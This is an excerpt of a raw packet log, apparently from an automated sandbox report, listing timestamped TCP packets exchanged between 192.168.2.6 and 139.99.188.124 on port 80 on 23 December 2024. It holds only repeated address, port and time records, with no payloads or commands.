                                                                                                        Dec 23, 2024 08:39:46.613404036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.613488913 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.613562107 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.614468098 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.614520073 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.614572048 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.615483999 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.615590096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.615731955 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.616511106 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.616591930 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.616638899 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.617549896 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.617631912 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.617717981 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.618597031 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.618810892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.618855000 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.619658947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.619760036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.620434046 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.620655060 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.620718002 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.620776892 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.621695042 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.621768951 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.621840000 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.622745037 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.622800112 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.622844934 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.623976946 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.624394894 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.624475002 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.624922037 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.625020027 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.625071049 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.625871897 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.625957966 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.626085043 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.626887083 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.627000093 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.627063990 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.627911091 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.628019094 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.628068924 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.628947020 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.629019976 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.629070044 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.630008936 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.630100965 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.630146027 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.631020069 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.631083965 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.631329060 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.632080078 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.632211924 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.632307053 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.633078098 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.633191109 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.633240938 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.634119987 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.634234905 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.634305000 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.635179043 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.635309935 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.635397911 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.636240959 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.636362076 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.636419058 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.637295008 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.637389898 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.637448072 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.638287067 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.638396025 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.638437986 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.639319897 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.639427900 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.639540911 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.640409946 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.640465975 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.640522957 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.641383886 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.641505003 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.641554117 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.642416954 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.642467022 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.642525911 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.643538952 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.643733025 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.643799067 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.644495010 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.644604921 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.644676924 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.645570993 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.645780087 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.645845890 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.646631956 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.646688938 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.646785021 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.647718906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.647758007 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.647805929 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.648741007 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.648821115 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.648868084 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.649732113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.782119036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.782208920 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.782301903 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.782661915 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.782743931 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.782769918 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.783596039 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.783720970 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.783756971 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.784616947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.784667969 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.784699917 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.785654068 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.785725117 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.785739899 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.786674023 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.786827087 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.786895990 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.787733078 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.787867069 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.787919044 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.788744926 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.788889885 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.788960934 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.789834023 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.789920092 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.789937019 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.790824890 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.790935993 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.791008949 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.797852039 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.797966003 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.798371077 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.798435926 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.798515081 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.799482107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.799554110 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.799580097 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.800642014 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.800797939 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.801943064 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.802053928 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.802094936 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.802941084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.802990913 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.803009033 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.803683043 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.803740025 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.803770065 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.804539919 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.804646015 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.804652929 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.805561066 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.805670977 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.805684090 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.806610107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.806684017 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.806694031 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.807626009 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.807722092 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.807857037 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.808655024 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.808703899 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.808737040 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.809712887 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.809835911 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.809889078 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.810703039 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.810753107 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.810816050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.811784029 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.811897993 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.811954021 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.812858105 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.812931061 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.812979937 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.813863993 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.813936949 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.814004898 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.814870119 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.814924002 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.814992905 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.815917015 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.815969944 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.816036940 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.816958904 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.817004919 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.817073107 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.817989111 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.818041086 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.818217039 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.819053888 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.819108963 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.819149971 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.820091009 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.820141077 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.820204020 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.821134090 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.821234941 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.821357965 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.822158098 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.822254896 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.822304010 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.823170900 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.823227882 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.823291063 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.824217081 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.824270010 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.824333906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.825236082 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.825290918 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.825359106 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.826292992 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.826407909 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.826428890 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.827328920 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.827439070 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.827497005 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.828432083 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.828486919 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.828515053 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.829412937 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.829457998 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.829524040 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.830435991 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.830486059 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.830529928 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.831449986 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.831619978 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.831675053 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.832487106 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.832535982 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.832614899 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.833545923 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.833595037 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.833619118 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.834543943 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.834645987 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.834696054 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.835604906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.835731983 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.835782051 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.836632967 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.836680889 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.836726904 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.837655067 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.837738037 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.837762117 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.838707924 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.838794947 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.838849068 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.839754105 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.839807034 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.839879036 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.840771914 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.840835094 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.840882063 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.841806889 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.841861010 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.974041939 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.974200010 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.974251032 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.974618912 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.974749088 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.974793911 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.975624084 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.975723028 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.976174116 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.976689100 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.976741076 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.976864100 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.977698088 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.977837086 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.978456020 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.978754044 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.978868008 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.978924990 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.979787111 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.979908943 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.980042934 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.980861902 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.980978966 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.981039047 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.981950998 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.981965065 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.982021093 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.982901096 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.983026028 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.984425068 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.990030050 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.990106106 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.990170002 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.990439892 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.990533113 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.990673065 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.991468906 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.991602898 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.991650105 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.992495060 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.992625952 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.992671967 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.993588924 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.993786097 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.993859053 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.994594097 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.994744062 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.994815111 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.995723963 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.995780945 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.995904922 CET4980080192.168.2.6139.99.188.124
                                                                                                        Dec 23, 2024 08:39:46.996680975 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.996797085 CET8049800139.99.188.124192.168.2.6
                                                                                                        Dec 23, 2024 08:39:46.996855021 CET4980080192.168.2.6139.99.188.124
